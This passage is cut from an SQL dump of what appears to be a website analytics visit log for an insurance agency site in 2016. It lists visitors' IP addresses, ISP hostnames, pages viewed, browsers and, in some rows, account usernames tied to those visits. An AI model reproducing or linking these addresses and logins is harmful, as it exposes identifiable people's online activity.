49','us','','','','','','','0','0',0),(23570,'0b_2c642804247e2f21cee53624fc0803bc','1462213302','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(23571,'0b_37c831ad12715514ae1c04b14d5dd8ff','1462214260','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(23574,'0b_37c831ad12715514ae1c04b14d5dd8ff','1462214262','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23577,'0b_37c831ad12715514ae1c04b14d5dd8ff','1462214280','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23580,'0b_37c831ad12715514ae1c04b14d5dd8ff','1462214360','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','joel32','','0','51',0),(23583,'0b_37c831ad12715514ae1c04b14d5dd8ff','1462214392','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','joel32','','0','51',0),(23585,'0b_37c831ad12715514ae1c04b14d5dd8ff','1462214397','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','joel32','','0','51',0),(23588,'0b_37c831ad12715514ae1c04b14d5dd8ff','1462214400','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','joel32','','0','51',0),(23591,'0b_37c831ad12715514ae1c04b14d5dd8ff','1462214401','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','joel32','','0','0',0),(23594,'0b_37c831ad12715514ae1c04b14d5dd8ff','1462214423','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','joel32','','0','51',0),(23595,'0b_37c831ad12715514ae1c04b14d5dd8ff','1462214428','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','joel32','','0','51',0),(23598,'0b_166fd752937602dfb6109379aea47b6c','1462214483','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(23601,'0b_166fd752937602dfb6109379aea47b6c','1462214486','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(23603,'0b_b982cdb5384854f35932ae428cf0ba15','1462215336','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(23604,'0b_b982cdb5384854f35932ae428cf0ba15','1462215338','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(23606,'0b_b982cdb5384854f35932ae428cf0ba15','1462215344','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(23609,'0b_b982cdb5384854f35932ae428cf0ba15','1462215364','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1600 x 900','','','','jspira1','','0','51',0),(23610,'0b_bdbbcf04c9ba1ed29bb4f45414aa5d06','1462215479','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23612,'0b_bdbbcf04c9ba1ed29bb4f45414aa5d06','1462215481','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23613,'0b_db7993c2092cb3bcca788e03aaa7976e','1462215524','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(23616,'0b_db7993c2092cb3bcca788e03aaa7976e','1462215525','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(23619,'0b_166fd752937602dfb6109379aea47b6c','1462215543','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23622,'0b_166fd752937602dfb6109379aea47b6c','1462215676','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(23625,'0b_166fd752937602dfb6109379aea47b6c','1462215696','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(23628,'0b_4864bc3e941ab8e28e78142dbcb83940','1462215783','66.85.119.202','66-85-119-202.static-ip.telepacific.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(23630,'0b_4864bc3e941ab8e28e78142dbcb83940','1462215786','66.85.119.202','66-85-119-202.static-ip.telepacific.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23633,'0b_166fd752937602dfb6109379aea47b6c','1462215800','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(23634,'0b_4864bc3e941ab8e28e78142dbcb83940','1462215809','66.85.119.202','66-85-119-202.static-ip.telepacific.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(23637,'0b_4864bc3e941ab8e28e78142dbcb83940','1462215812','66.85.119.202','66-85-119-202.static-ip.telepacific.net','/insentives/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(23639,'0b_4864bc3e941ab8e28e78142dbcb83940','1462215816','66.85.119.202','66-85-119-202.static-ip.telepacific.net','/about-us/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(23642,'0b_166fd752937602dfb6109379aea47b6c','1462215818','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(23643,'0b_166fd752937602dfb6109379aea47b6c','1462215892','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/members/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','execut1ve','','0','51',0),(23645,'0b_4864bc3e941ab8e28e78142dbcb83940','1462216446','66.85.119.202','66-85-119-202.static-ip.telepacific.net','/contact/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(23646,'0b_c2401da3d648cc80285aecf5a320b527','1462217427','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23649,'0b_c2401da3d648cc80285aecf5a320b527','1462217428','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23651,'0b_c2401da3d648cc80285aecf5a320b527','1462217434','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23652,'0b_c2401da3d648cc80285aecf5a320b527','1462217468','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','execut1ve','','0','51',0),(23655,'0b_95fa99c9053a1e3330e79bd25d60db15','1462217712','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(23657,'0b_95fa99c9053a1e3330e79bd25d60db15','1462217970','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(23660,'0b_c2401da3d648cc80285aecf5a320b527','1462217981','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','execut1ve','','0','51',0),(23661,'0b_ead37f471ceba6276542501d18a8147e','1462217989','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23663,'0b_ead37f471ceba6276542501d18a8147e','1462218005','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/carriers','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(23666,'0b_dfa90961f7219ae7d5a40c093e1866d1','1462218008','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','joel32','','0','0',0),(23667,'0b_ead37f471ceba6276542501d18a8147e','1462218012','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/carriers/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(23670,'0b_dfa90961f7219ae7d5a40c093e1866d1','1462218016','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','joel32','','0','51',0),(23672,'0b_dfa90961f7219ae7d5a40c093e1866d1','1462218026','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','joel32','','0','51',0),(23675,'0b_dfa90961f7219ae7d5a40c093e1866d1','1462218034','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','joel32','','0','51',0),(23678,'0b_dfa90961f7219ae7d5a40c093e1866d1','1462218126','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','joel32','','0','51',0),(23679,'0b_dfa90961f7219ae7d5a40c093e1866d1','1462218130','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/register/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','joel32','','0','51',0),(23681,'0b_c2401da3d648cc80285aecf5a320b527','1462218138','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/contact/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','execut1ve','','0','51',0),(23684,'0b_dfa90961f7219ae7d5a40c093e1866d1','1462218140','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','joel32','','0','51',0),(23687,'0b_c2401da3d648cc80285aecf5a320b527','1462218170','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/contact/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','execut1ve','','0','51',0),(23688,'0b_95fa99c9053a1e3330e79bd25d60db15','1462218173','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(23690,'0b_95fa99c9053a1e3330e79bd25d60db15','1462218174','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(23693,'0b_8d15bccb04892cdaf092023e5fc5720a','1462218480','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23696,'0b_8d15bccb04892cdaf092023e5fc5720a','1462218483','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23699,'0b_8d15bccb04892cdaf092023e5fc5720a','1462218487','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(23702,'0b_a66bce2edf9e646c6b2b11eaa11f4ecb','1462218493','73.76.26.135','c-73-76-26-135.hsd1.tx.comcast.net','/pay','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','','',0,'Win10 x64','Firefox 45','us','1366 x 768','','','','','','0','0',0),(23703,'0b_8d15bccb04892cdaf092023e5fc5720a','1462218509','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(23706,'0b_a66bce2edf9e646c6b2b11eaa11f4ecb','1462218512','73.76.26.135','c-73-76-26-135.hsd1.tx.comcast.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/pay','',0,'Win10 x64','Firefox 45','us','1366 x 768','','','','','','0','0',0),(23708,'0b_a66bce2edf9e646c6b2b11eaa11f4ecb','1462218513','73.76.26.135','c-73-76-26-135.hsd1.tx.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 45','us','1366 x 768','','','','','','0','0',0),(23711,'0b_1c95549d0dcd4e8f8abe1ab22d42ea61','1462218915','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)','http://shopvilleroyboch.com.ua/','',0,'WinXP','IE 6','ua','','','','','','','0','0',0),(23714,'0b_1c95549d0dcd4e8f8abe1ab22d42ea61','1462218915','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)','http://shopvilleroyboch.com.ua/','',0,'WinXP','IE 6','ua','','','','','','','0','0',0),(23715,'0b_e5546c42bd094154ab30c3c7d5d414ea','1462219733','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(23718,'0b_e5546c42bd094154ab30c3c7d5d414ea','1462219738','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(23720,'0b_e5546c42bd094154ab30c3c7d5d414ea','1462219752','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(23723,'0b_e5546c42bd094154ab30c3c7d5d414ea','1462219938','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','execut1ve','','0','51',0),(23726,'0b_e5546c42bd094154ab30c3c7d5d414ea','1462220015','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','execut1ve','','0','51',0),(23729,'0b_e5546c42bd094154ab30c3c7d5d414ea','1462220294','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/life-product-search/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','execut1ve','','0','51',0),(23730,'0b_e5546c42bd094154ab30c3c7d5d414ea','1462220533','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(23733,'0b_e5546c42bd094154ab30c3c7d5d414ea','1462220537','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(23735,'0b_e5546c42bd094154ab30c3c7d5d414ea','1462220600','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(23736,'0b_e5546c42bd094154ab30c3c7d5d414ea','1462220780','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','execut1ve','','0','51',0),(23738,'0b_345b8375a85a2142d71bb98a71ea3deb','1462221828','46.165.197.141','46.165.197.141','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(23739,'0b_345b8375a85a2142d71bb98a71ea3deb','1462221840','46.165.197.141','46.165.197.141','/SSO/235_11.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(23741,'0b_345b8375a85a2142d71bb98a71ea3deb','1462221851','46.165.197.141','46.165.197.141','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(23744,'0b_345b8375a85a2142d71bb98a71ea3deb','1462221864','46.165.197.141','46.165.197.141','/SSO/235_11.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(23745,'0b_347b524a812b2597c6542eda707c3a16','1462222262','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(23748,'0b_347b524a812b2597c6542eda707c3a16','1462222265','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 